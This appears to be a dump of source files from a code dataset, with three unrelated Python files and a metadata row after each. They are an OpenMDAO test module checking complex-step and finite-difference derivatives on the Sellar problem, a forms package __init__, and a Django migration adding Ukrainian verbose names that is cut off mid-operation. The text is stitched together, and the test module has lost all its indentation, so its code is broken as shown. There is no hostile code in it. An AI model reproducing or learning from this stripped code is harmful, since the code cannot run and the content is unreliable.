sub.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0', con2=0.0, y2=0.0),
promotes=['con2', 'y2'])
self.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
self.linear_solver = om.LinearBlockGS()
self.linear_solver.options['maxiter'] = 25
self.linear_solver.options['atol'] = 1e-16
prob = om.Problem()
prob.model = SellarDerivatives()
prob.setup()
prob.model.approx_totals(method='cs')
prob.run_model()
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_newton_with_krylov_solver_'+'_'.join(title(a) for a in p.args))
def test_newton_with_krylov_solver(self, vec_class):
# Basic sellar test.
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.ScipyKrylov()
sub.nonlinear_solver.options['atol'] = 1e-10
sub.nonlinear_solver.options['rtol'] = 1e-10
sub.linear_solver.options['atol'] = 1e-15
model.approx_totals(method='cs', step=1e-14)
prob.setup(check=False, local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
def test_newton_with_cscjac_under_cs(self):
# Basic sellar test.
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.ScipyKrylov(assemble_jac=True)
sub.nonlinear_solver.options['atol'] = 1e-20
sub.nonlinear_solver.options['rtol'] = 1e-20
model.approx_totals(method='cs', step=1e-12)
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z', 'x']
of = ['obj', 'con1']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
def test_newton_with_fd_group(self):
# Basic sellar test.
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
subfd = sub.add_subsystem('subfd', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
subfd.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
subfd.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
# Finite difference for the Newton linear solve only
subfd.approx_totals(method='fd')
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.nonlinear_solver.options['maxiter'] = 12
sub.linear_solver = om.DirectSolver(assemble_jac=False)
sub.nonlinear_solver.options['atol'] = 1e-20
sub.nonlinear_solver.options['rtol'] = 1e-20
# Complex Step for top derivatives
model.approx_totals(method='cs', step=1e-14)
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
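# The test above composes two approximations; a sketch of just the two calls,
# using the names from this test:
#
#     subfd.approx_totals(method='fd')               # FD Jacobian for the Newton solve
#     model.approx_totals(method='cs', step=1e-14)   # CS for the top-level totals
#
# Newton inside 'sub' linearizes through the FD'd 'subfd' group, while the
# model-level totals are complex-stepped across the whole hierarchy.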
def test_nested_complex_step_unsupported(self):
# Basic sellar test.
prob = self.prob = om.Problem()
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
model.add_subsystem('d1', SellarDis1CS(), promotes=['x', 'z', 'y1', 'y2'])
model.add_subsystem('d2', SellarDis2CS(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
prob.model.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
prob.model.linear_solver = om.DirectSolver(assemble_jac=False)
prob.model.approx_totals(method='cs')
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z']
of = ['obj']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
outs = prob.model.list_outputs(residuals=True, out_stream=None)
for name, meta in outs:
val = np.linalg.norm(meta['resids'])
self.assertLess(val, 1e-8, msg="Check if CS cleans up after itself.")
class TestComponentComplexStep(unittest.TestCase):
def test_implicit_component(self):
class TestImplCompArrayDense(TestImplCompArray):
def setup(self):
super().setup()
self.declare_partials('*', '*', method='cs')
prob = self.prob = om.Problem()
model = prob.model
model.add_subsystem('p_rhs', om.IndepVarComp('rhs', val=np.ones(2)))
sub = model.add_subsystem('sub', om.Group())
comp = sub.add_subsystem('comp', TestImplCompArrayDense())
model.connect('p_rhs.rhs', 'sub.comp.rhs')
model.linear_solver = om.ScipyKrylov()
prob.setup()
prob.run_model()
model.run_linearize()
Jfd = comp._jacobian
assert_near_equal(Jfd['sub.comp.x', 'sub.comp.rhs'], -np.eye(2), 1e-6)
assert_near_equal(Jfd['sub.comp.x', 'sub.comp.x'], comp.mtx, 1e-6)
def test_vector_methods(self):
class KenComp(om.ExplicitComponent):
def setup(self):
self.add_input('x1', np.array([[7.0, 3.0], [2.4, 3.33]]))
self.add_output('y1', np.zeros((2, 2)))
self.declare_partials('*', '*', method='cs')
def compute(self, inputs, outputs):
x1 = inputs['x1']
outputs['y1'] = x1
outputs['y1'][0][0] += 14.0
outputs['y1'][0][1] *= 3.0
outputs['y1'][1][0] -= 6.67
outputs['y1'][1][1] /= 2.34
outputs['y1'] *= 1.0
prob = self.prob = om.Problem()
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', val=np.array([[7.0, 3.0], [2.4, 3.33]])))
model.add_subsystem('comp', KenComp())
model.connect('px.x', 'comp.x1')
prob.setup()
prob.run_model()
of = ['comp.y1']
wrt = ['px.x']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['comp.y1', 'px.x'][0][0], 1.0, 1e-6)
assert_near_equal(derivs['comp.y1', 'px.x'][1][1], 3.0, 1e-6)
assert_near_equal(derivs['comp.y1', 'px.x'][2][2], 1.0, 1e-6)
assert_near_equal(derivs['comp.y1', 'px.x'][3][3], 1.0/2.34, 1e-6)
def test_sellar_comp_cs(self):
# Basic sellar test.
prob = self.prob = om.Problem()
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
model.add_subsystem('d1', SellarDis1CS(), promotes=['x', 'z', 'y1', 'y2'])
model.add_subsystem('d2', SellarDis2CS(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
prob.model.nonlinear_solver = om.NonlinearBlockGS()
prob.model.linear_solver = om.DirectSolver(assemble_jac=False)
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z']
of = ['obj']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
outs = prob.model.list_outputs(residuals=True, out_stream=None)
for name, meta in outs:
val = np.linalg.norm(meta['resids'])
self.assertLess(val, 1e-8, msg="Check if CS cleans up after itself.")
def test_stepsizes_under_complex_step(self):
import openmdao.api as om
class SimpleComp(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=1.0)
self.add_output('y', val=1.0)
self.declare_partials(of='y', wrt='x', method='cs')
self.count = 0
def compute(self, inputs, outputs):
outputs['y'] = 3.0*inputs['x']
if self.under_complex_step:
# Local cs
if self.count == 0 and inputs['x'].imag != 1.0e-40:
msg = "Wrong stepsize for local CS"
raise RuntimeError(msg)
# Global cs with default setting.
if self.count == 1 and inputs['x'].imag != 1.0e-40:
msg = "Wrong stepsize for default global CS"
raise RuntimeError(msg)
# Global cs with user setting.
if self.count == 3 and inputs['x'].imag != 1.0e-12:
msg = "Wrong stepsize for user global CS"
raise RuntimeError(msg)
# Check partials cs with default setting forward.
if self.count == 4 and inputs['x'].imag != 1.0e-40:
msg = "Wrong stepsize for check partial default CS forward"
raise RuntimeError(msg)
# Check partials cs with default setting.
if self.count == 5 and inputs['x'].imag != 1.0e-40:
msg = "Wrong stepsize for check partial default CS"
raise RuntimeError(msg)
# Check partials cs with user setting forward.
if self.count == 6 and inputs['x'].imag != 1.0e-40:
msg = "Wrong stepsize for check partial user CS forward"
raise RuntimeError(msg)
# Check partials cs with user setting.
if self.count == 7 and inputs['x'].imag != 1.0e-14:
msg = "Wrong stepsize for check partial user CS"
raise RuntimeError(msg)
self.count += 1
def compute_partials(self, inputs, partials):
partials['y', 'x'] = 3.
prob = om.Problem()
prob.model.add_subsystem('px', om.IndepVarComp('x', val=1.0))
prob.model.add_subsystem('comp', SimpleComp())
prob.model.connect('px.x', 'comp.x')
prob.model.add_design_var('px.x', lower=-100, upper=100)
prob.model.add_objective('comp.y')
prob.setup(force_alloc_complex=True)
prob.run_model()
prob.check_totals(method='cs', out_stream=None)
prob.check_totals(method='cs', step=1e-12, out_stream=None)
prob.check_partials(method='cs', out_stream=None)
prob.check_partials(method='cs', step=1e-14, out_stream=None)
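# Note: 1.0e-40 is OpenMDAO's default complex-step size, which is why the
# unmodified calls above expect that imaginary perturbation; the step=1e-12 and
# step=1e-14 overrides are what counts 3 and 7 in compute() look for.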
def test_feature_under_complex_step(self):
import openmdao.api as om
class SimpleComp(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=1.0)
self.add_output('y', val=1.0)
self.declare_partials(of='y', wrt='x', method='cs')
def compute(self, inputs, outputs):
outputs['y'] = 3.0*inputs['x']
if self.under_complex_step:
print("Under complex step")
print("x", inputs['x'])
print("y", outputs['y'])
prob = om.Problem()
prob.model.add_subsystem('comp', SimpleComp())
prob.model.add_design_var('comp.x', lower=-100, upper=100)
prob.model.add_objective('comp.y')
prob.setup(force_alloc_complex=True)
prob.run_model()
prob.compute_totals(of=['comp.y'], wrt=['comp.x'])
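# A minimal, self-contained sketch (not run by the suite) of the component-level
# complex-step workflow exercised by the class above; names are illustrative.
def _example_component_cs_check():
    import openmdao.api as om

    class Times3(om.ExplicitComponent):
        def setup(self):
            self.add_input('x', val=1.0)
            self.add_output('y', val=1.0)
            # Partials approximated by complex step instead of compute_partials().
            self.declare_partials('y', 'x', method='cs')

        def compute(self, inputs, outputs):
            outputs['y'] = 3.0 * inputs['x']

    prob = om.Problem()
    prob.model.add_subsystem('comp', Times3())
    # Complex vectors must be allocated up front for CS to work.
    prob.setup(force_alloc_complex=True)
    prob.run_model()
    return prob.check_partials(method='cs', compact_print=True, out_stream=None)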
class ApproxTotalsFeature(unittest.TestCase):
def test_basic(self):
import numpy as np
import openmdao.api as om
class CompOne(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_output('y', val=np.zeros(25))
self._exec_count = 0
def compute(self, inputs, outputs):
x = inputs['x']
outputs['y'] = np.arange(25) * x
self._exec_count += 1
class CompTwo(om.ExplicitComponent):
def setup(self):
self.add_input('y', val=np.zeros(25))
self.add_output('z', val=0.0)
self._exec_count = 0
def compute(self, inputs, outputs):
y = inputs['y']
outputs['z'] = np.sum(y)
self._exec_count += 1
prob = om.Problem()
model = prob.model
model.set_input_defaults('x', 0.0)
model.add_subsystem('comp1', CompOne(), promotes=['x', 'y'])
comp2 = model.add_subsystem('comp2', CompTwo(), promotes=['y', 'z'])
model.linear_solver = om.ScipyKrylov()
model.approx_totals()
prob.setup()
prob.run_model()
of = ['z']
wrt = ['x']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['z', 'x'], [[300.0]], 1e-6)
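# comp2 runs once in run_model and once more for the single FD column of scalar 'x'.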
self.assertEqual(comp2._exec_count, 2)
def test_basic_cs(self):
import numpy as np
import openmdao.api as om
class CompOne(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_output('y', val=np.zeros(25))
self._exec_count = 0
def compute(self, inputs, outputs):
x = inputs['x']
outputs['y'] = np.arange(25) * x
self._exec_count += 1
class CompTwo(om.ExplicitComponent):
def setup(self):
self.add_input('y', val=np.zeros(25))
self.add_output('z', val=0.0)
self._exec_count = 0
def compute(self, inputs, outputs):
y = inputs['y']
outputs['z'] = np.sum(y)
self._exec_count += 1
prob = om.Problem()
model = prob.model
model.set_input_defaults('x', 0.0)
model.add_subsystem('comp1', CompOne(), promotes=['x', 'y'])
model.add_subsystem('comp2', CompTwo(), promotes=['y', 'z'])
model.linear_solver = om.ScipyKrylov()
model.approx_totals(method='cs')
prob.setup()
prob.run_model()
of = ['z']
wrt = ['x']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['z', 'x'], [[300.0]], 1e-6)
def test_arguments(self):
import numpy as np
import openmdao.api as om
class CompOne(om.ExplicitComponent):
def setup(self):
self.add_input('x', val=1.0)
self.add_output('y', val=np.zeros(25))
self._exec_count = 0
def compute(self, inputs, outputs):
x = inputs['x']
outputs['y'] = np.arange(25) * x
self._exec_count += 1
class CompTwo(om.ExplicitComponent):
def setup(self):
self.add_input('y', val=np.zeros(25))
self.add_output('z', val=0.0)
self._exec_count = 0
def compute(self, inputs, outputs):
y = inputs['y']
outputs['z'] = np.sum(y)
self._exec_count += 1
prob = om.Problem()
model = prob.model
model.add_subsystem('comp1', CompOne(), promotes=['x', 'y'])
model.add_subsystem('comp2', CompTwo(), promotes=['y', 'z'])
model.linear_solver = om.ScipyKrylov()
model.approx_totals(method='fd', step=1e-7, form='central', step_calc='rel')
prob.setup()
prob.run_model()
of = ['z']
wrt = ['x']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['z', 'x'], [[300.0]], 1e-6)
def test_sellarCS(self):
# Just tests Newton on Sellar with complex-step derivs.
import openmdao.api as om
from openmdao.test_suite.components.sellar_feature import SellarNoDerivativesCS
prob = om.Problem()
prob.model = SellarNoDerivativesCS()
prob.setup()
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
# Make sure we aren't iterating like crazy
self.assertLess(prob.model.nonlinear_solver._iter_count, 9)
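# Note on the arguments exercised in test_arguments above: 'form' selects the FD
# stencil and step_calc='rel' scales the step by the input's magnitude. Roughly:
#
#     forward:  df/dx ~ (f(x + h) - f(x)) / h           # 1 extra run per column
#     central:  df/dx ~ (f(x + h) - f(x - h)) / (2*h)   # 2 extra runs, O(h**2) error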
class ParallelFDParametricTestCase(unittest.TestCase):
@parametric_suite(
assembled_jac=[False],
jacobian_type=['dense'],
partial_type=['array'],
partial_method=['fd', 'cs'],
num_var=[3],
var_shape=[(2, 3), (2,)],
connection_type=['explicit'],
run_by_default=True,
)
def test_subset(self, param_instance):
param_instance.linear_solver_class = om.DirectSolver
param_instance.linear_solver_options = {} # defaults not valid for DirectSolver
param_instance.setup()
problem = param_instance.problem
model = problem.model
expected_values = model.expected_values
if expected_values:
actual = {key: problem[key] for key in expected_values}
assert_near_equal(actual, expected_values, 1e-4)
expected_totals = model.expected_totals
if expected_totals:
# Forward Derivatives Check
totals = param_instance.compute_totals('fwd')
assert_near_equal(totals, expected_totals, 1e-4)
# Reverse Derivatives Check
totals = param_instance.compute_totals('rev')
assert_near_equal(totals, expected_totals, 1e-4)
class CheckTotalsParallelGroup(unittest.TestCase):
N_PROCS = 3
def test_vois_in_parallelgroup(self):
class PassThruComp(om.ExplicitComponent):
def initialize(self):
self.options.declare('time', default=3.0)
self.options.declare('size', default=1)
def setup(self):
size = self.options['size']
self.add_input('x', shape=size)
self.add_output('y', shape=size)
self.declare_partials('y', 'x')
def compute(self, inputs, outputs):
waittime = self.options['time']
if not inputs._under_complex_step:
print('sleeping: ')
time.sleep(waittime)
outputs['y'] = inputs['x']
def compute_partials(self, inputs, J):
size = self.options['size']
J['y', 'x'] = np.eye(size)
model = om.Group()
iv = om.IndepVarComp()
size = 1
iv.add_output('x', val=3.0 * np.ones((size, )))
model.add_subsystem('iv', iv)
pg = model.add_subsystem('pg', om.ParallelGroup(), promotes=['*'])
pg.add_subsystem('dc1', PassThruComp(size=size, time=0.0))
pg.add_subsystem('dc2', PassThruComp(size=size, time=0.0))
pg.add_subsystem('dc3', PassThruComp(size=size, time=0.0))
model.connect('iv.x', ['dc1.x', 'dc2.x', 'dc3.x'])
model.add_subsystem('adder', om.ExecComp('z = sum(y1)+sum(y2)+sum(y3)', y1={'value': np.zeros((size, ))},
y2={'value': np.zeros((size, ))},
y3={'value': np.zeros((size, ))}))
model.connect('dc1.y', 'adder.y1')
model.connect('dc2.y', 'adder.y2')
model.connect('dc3.y', 'adder.y3')
model.add_design_var('iv.x', lower=-1.0, upper=1.0)
# this objective works fine
# model.add_objective('adder.z')
# this objective used to raise a concatenation error under both fd and cs
# (issue 1403)
model.add_objective('dc1.y')
# for some reason this constraint is fine even though it only lives on proc 3
model.add_constraint('dc3.y', lower=-1.0, upper=1.0)
prob = om.Problem(model=model)
prob.setup(force_alloc_complex=True)
prob.run_model()
data = prob.check_totals(method='cs', out_stream=None)
assert_near_equal(data[('pg.dc1.y', 'iv.x')]['abs error'][0], 0.0, 1e-6)
assert_near_equal(data[('pg.dc3.y', 'iv.x')]['abs error'][0], 0.0, 1e-6)
if __name__ == "__main__":
unittest.main()
| 38.686032 | 115 | 0.556027 | 12,111 | 90,564 | 4.006771 | 0.048386 | 0.05564 | 0.059659 | 0.032972 | 0.865948 | 0.84464 | 0.830318 | 0.816366 | 0.797882 | 0.778243 | 0 | 0.062809 | 0.275176 | 90,564 | 2,340 | 116 | 38.702564 | 0.676432 | 0.032938 | 0 | 0.777707 | 0 | 0 | 0.091984 | 0.003886 | 0 | 0 | 0 | 0 | 0.133629 | 1 | 0.070931 | false | 0.005067 | 0.021533 | 0 | 0.119696 | 0.021533 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 7 | d9ce0ea12fe7cd5056e523bed51d1c631b38e66c | 139 | py | Python | app/forms/__init__.py | maricio41/homebase | 5885d533a03b8f6701c5fe21714b39377565d3a0 | ["MIT"] | 2 | 2021-07-01T13:10:59.000Z | 2021-07-01T13:11:07.000Z | app/forms/__init__.py | maricio41/homebase | 5885d533a03b8f6701c5fe21714b39377565d3a0 | ["MIT"] | null | null | null | app/forms/__init__.py | maricio41/homebase | 5885d533a03b8f6701c5fe21714b39377565d3a0 | ["MIT"] | null | null | null |
from .login_form import LoginForm
from .signup_form import SignUpForm
from .team_form import TeamForm
from .team_form import AddMemberForm
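# Re-exporting the form classes at the package root lets callers write, e.g.,
# `from app.forms import LoginForm` instead of importing each submodule.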
| 27.8 | 36 | 0.856115 | 20 | 139 | 5.75 | 0.5 | 0.347826 | 0.208696 | 0.313043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115108 | 139 | 4 | 37 | 34.75 | 0.934959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0 | 8 | d9dfade10b44a59029ca2e8292041251907159ea | 24,216 | py | Python | business_register/migrations/0026_auto_20200724_1927.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | ["MIT"] | null | null | null | business_register/migrations/0026_auto_20200724_1927.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | ["MIT"] | null | null | null | business_register/migrations/0026_auto_20200724_1927.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | ["MIT"] | null | null | null |
# Generated by Django 3.0.7 on 2020-07-24 19:27
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('data_ocean', '0006_auto_20200724_1128'),
('business_register', '0025_auto_20200722_1314'),
]
operations = [
migrations.AlterModelOptions(
name='assignee',
options={'verbose_name': 'правонаступник', 'verbose_name_plural': 'правонаступники'},
),
migrations.AlterModelOptions(
name='bylaw',
options={'verbose_name': 'статут'},
),
migrations.AlterModelOptions(
name='company',
options={'verbose_name': 'компанія/організація'},
),
migrations.AlterModelOptions(
name='companydetail',
options={'verbose_name': 'додаткові дані'},
),
migrations.AlterModelOptions(
name='companytokved',
options={'verbose_name': 'КВЕДи компанії'},
),
migrations.AlterModelOptions(
name='companytype',
options={'verbose_name': 'організаційно-правова форма'},
),
migrations.AlterModelOptions(
name='fop',
options={'verbose_name': 'фізична особа-підприємець'},
),
migrations.AlterModelOptions(
name='foptokved',
options={'verbose_name': 'КВЕДи ФОП'},
),
migrations.AlterModelOptions(
name='founder',
options={'verbose_name': 'засновник', 'verbose_name_plural': 'засновники'},
),
migrations.AlterModelOptions(
name='historicalassignee',
options={'get_latest_by': 'history_date', 'ordering': ('-history_date', '-history_id'), 'verbose_name': 'historical правонаступник'},
),
migrations.AlterModelOptions(
name='historicalcompany',
options={'get_latest_by': 'history_date', 'ordering': ('-history_date', '-history_id'), 'verbose_name': 'historical компанія/організація'},
),
migrations.AlterModelOptions(
name='historicalcompanydetail',
options={'get_latest_by': 'history_date', 'ordering': ('-history_date', '-history_id'), 'verbose_name': 'historical додаткові дані'},
),
migrations.AlterModelOptions(
name='historicalfop',
options={'get_latest_by': 'history_date', 'ordering': ('-history_date', '-history_id'), 'verbose_name': 'historical фізична особа-підприємець'},
),
migrations.AlterModelOptions(
name='historicalfounder',
options={'get_latest_by': 'history_date', 'ordering': ('-history_date', '-history_id'), 'verbose_name': 'historical засновник'},
),
migrations.AlterModelOptions(
name='historicalsigner',
options={'get_latest_by': 'history_date', 'ordering': ('-history_date', '-history_id'), 'verbose_name': 'historical має право підпису'},
),
migrations.AlterModelOptions(
name='kved',
options={'verbose_name': 'КВЕД'},
),
migrations.AlterModelOptions(
name='kveddivision',
options={'verbose_name': 'розділ'},
),
migrations.AlterModelOptions(
name='kvedgroup',
options={'verbose_name': 'група'},
),
migrations.AlterModelOptions(
name='kvedsection',
options={'verbose_name': 'секція'},
),
migrations.AlterModelOptions(
name='predecessor',
options={'verbose_name': 'попередник', 'verbose_name_plural': 'попередники'},
),
migrations.AlterModelOptions(
name='signer',
options={'verbose_name': 'має право підпису', 'verbose_name_plural': 'мають право підпису'},
),
migrations.AlterField(
model_name='assignee',
name='company',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='assignees', to='business_register.Company', verbose_name='є правонаступником'),
),
migrations.AlterField(
model_name='assignee',
name='edrpou',
field=models.CharField(max_length=11, null=True, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='assignee',
name='name',
field=models.CharField(max_length=610, null=True, verbose_name='правонаступник'),
),
migrations.AlterField(
model_name='bancruptcyreadjustment',
name='reason',
field=models.TextField(null=True, verbose_name='підстава'),
),
migrations.AlterField(
model_name='bylaw',
name='name',
field=models.CharField(max_length=320, null=True, unique=True, verbose_name='статут'),
),
migrations.AlterField(
model_name='company',
name='address',
field=models.CharField(max_length=1000, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='company',
name='authority',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='data_ocean.Authority', verbose_name='орган реєстрації'),
),
migrations.AlterField(
model_name='company',
name='authorized_capital',
field=models.FloatField(null=True, verbose_name='статутний капітал'),
),
migrations.AlterField(
model_name='company',
name='bylaw',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.Bylaw', verbose_name='статут'),
),
migrations.AlterField(
model_name='company',
name='company_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='business_register.CompanyType', verbose_name='організаційно-правова форма'),
),
migrations.AlterField(
model_name='company',
name='contact_info',
field=models.CharField(max_length=310, null=True, verbose_name='контакти'),
),
migrations.AlterField(
model_name='company',
